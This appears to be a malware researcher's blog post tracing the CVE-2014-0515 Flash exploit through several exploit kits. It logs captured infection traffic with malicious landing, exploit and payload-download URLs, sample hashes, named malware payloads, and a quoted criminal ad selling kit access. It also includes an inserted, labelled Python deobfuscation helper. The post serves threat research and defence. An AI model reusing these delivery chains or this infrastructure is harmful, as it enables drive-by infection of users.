Discovered by Kaspersky in April in a watering-hole attack, used soon after in an operation targeting banking information in Japan/Korea (reported by Symantec), published on Exploit-DB at the beginning of May, then seen in malvertising tied to Brazil 2014 (SpiderLabs), the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier) has found its way into exploit kits. I spotted it on 2014-06-05 in the CottonCastle exploit kit (blog post coming). Brad spotted it in Flash EK.
CottonCastle EK:
CVE-2014-0515 exploit in CottonCastle 2014-06-05 |
Flash EK: 2014-06-06 (I decided to use the coder's name for this kit)
The Flash EK coder announced the new exploit on the underground on 2014-06-05:
"Added new exploits. The penetration rate has gone up significantly. With our VPS and domains - 350 USD per week. With yours - 250. Bitcoin or Paymer cheque. I don't understand English. We don't accept traffic from the CIS."
(translated from the Russian original: "Добавлены новые сплоиты. Существенно поднялся пробив. С нашими впс и доменами - 350 уев в неделю. С вашими - 250. Битки или чек паймер. По английски не понимаю. Траф из СНГ не принимаем.")
The penetration (infection) rate rose by up to 45% over its pre-CVE-2014-0515 value.
CVE-2014-0515 as spotted by Brad in Flash EK 2014-06-06 |
200 OK (text/html)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d (6376652d323031342d303531352e636f6d is the referer in hex; it decodes to cve-2014-0515.com)
200 OK (text/html) http://pastebin.com/HdVf799r
Flash part of the JS detect in Flash EK 2014-06-06 |
POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH
POST data to json.php |
json.php in Flash EK 2014-06-06 |
And after one more hex2text : http://pastebin.com/0F9Z2tiW
json.php after multiple hex2bin Flash EK 2014-06-06 |
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW
After some deobfuscation (unescape, hex2text): http://pastebin.com/TjMyS6YW
After one more hex2text: http://pastebin.com/SVGS4yhD
After 3 hex2text passes: flash0515.php in Flash EK 2014-06-06 |
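The unescape/hex2text peeling applied above (to the pd.php id parameter, to the json.php response and to the flash0515.php chain) is tedious to do by hand in a text editor. The following Python helper is an added example, not code from this post or from the kit: it applies one JavaScript-style unescape() layer and then hex-decodes repeatedly until the result stops looking like hex. The only value taken from the traffic above is the pd.php id; the nested sample is constructed here for illustration.

```python
import binascii
import re
from urllib.parse import unquote

# An even-length run of hex digits is what the kit's hex2text layers look like.
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def is_hex_blob(s: str) -> bool:
    return len(s) > 0 and len(s) % 2 == 0 and HEX_RE.match(s) is not None


def peel_hex(s: str, max_rounds: int = 10):
    """Hex-decode s repeatedly until the result no longer looks like hex.

    Returns (text, rounds). Decoding stops early when a layer is not valid
    UTF-8 text (e.g. the innermost layer is binary, as with hex2bin'd
    payload data), so the caller still gets the deepest printable layer.
    """
    current = s.strip()
    rounds = 0
    while rounds < max_rounds and is_hex_blob(current):
        try:
            decoded = binascii.unhexlify(current).decode("utf-8")
        except UnicodeDecodeError:
            break
        current = decoded
        rounds += 1
    return current, rounds


def deobfuscate(s: str):
    """Apply a JavaScript-style unescape() (%XX) layer, then iterated hex2text."""
    return peel_hex(unquote(s))


if __name__ == "__main__":
    # Value taken from the pd.php request above: the referer in hex.
    referer_hex = "6376652d323031342d303531352e636f6d"
    print(peel_hex(referer_hex))  # ('cve-2014-0515.com', 1)

    # Constructed sample (not from the kit): a path name wrapped in two hex
    # layers, mirroring the several hex2text passes the flash0515.php chain needed.
    nested = "flash0515.php".encode().hex().encode().hex()
    print(peel_hex(nested))  # ('flash0515.php', 2)
```

Two caveats: a short token that happens to be made only of hex letters is attempted as one more layer, and is kept as-is only when the bytes are not valid UTF-8 (so "beef" survives, but a real word that decodes to a printable code point would not); and max_rounds is a safety stop, not a detection mechanism, so read the result rather than trusting the round count.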
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c
CVE-2014-0515, DoSWF protected (I won't try to go further) |
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream) bde9e91d8a9e19a45c9ebd44393c0194 Glupteba (thanks to Marc-Étienne Léveillé from ESET for the identification; MS flagging it as Carberp made me wonder)
Files: 2014-06-06_CVE-2014-0515.zip
You'll find the pcap and additional data on Malware-Traffic-Analysis.
Sweet Orange:
Spotted by Brad on the 12th (2014-06-12).
CVE-2014-0515 successful pass in Sweet Orange |
200 OK (text/html)
GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1
CVE-2014-0515 in Sweet Orange |
GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)
Files: Fiddler/Payload/Flash
Nuclear Pack:
2014-06-15
The exploit is inside (for instance: 444d411a353f6bd8209f91555dfd713b).
2014-06-18
After multiple tries without being infected by this exploit on Flash 13.0.0.182, I finally got a "successful" pass (thanks to Will Metcalf for the Referer).
CVE-2014-0515 positive pass in Nuclear Pack |
GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)
GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)
GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d
GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )
Files: Fiddler/Payload/Flash
Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit identification by Kaspersky.
CVE-2014-0515 successful pass in Angler EK 2014-07-03 |
200 OK (text/html) Landing (Pastebin)
The landing contains some AV detection (Kaspersky and TrendMicro):
AV detection ( Function0 http://pastebin.com/hjH8ijuA ) |
Silverlight/Flash trigger
Modification spotted by EKWatcher (Function1: http://pastebin.com/H2DdDeVf) |
And an impossible path:
Impossible path (Function1: http://pastebin.com/H2DdDeVf) |
[OT] Silverlight calls: Function2 http://pastebin.com/Vd869rDX [/OT]
Flash call (Function3)
Flash calls, Function3 http://pastebin.com/maY5Wz1X |
GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333
After decryption (Kaspersky's work)
Piece of CVE-2014-0515 in decrypted flash from Angler EK |
GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)
Files: Fiddler/Flash
Styx: 2014-08-22
Update coming shortly.
Read more:
CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis
CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03
Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30
Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit - Matt_Oh - HP - 2014-05-23
Adobe Flash Player Shader Buffer Overflow Exploit - ExploitDB - 2014-05-09
New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks - Vyacheslav Zakorzhevsky - Kaspersky - 2014-04-28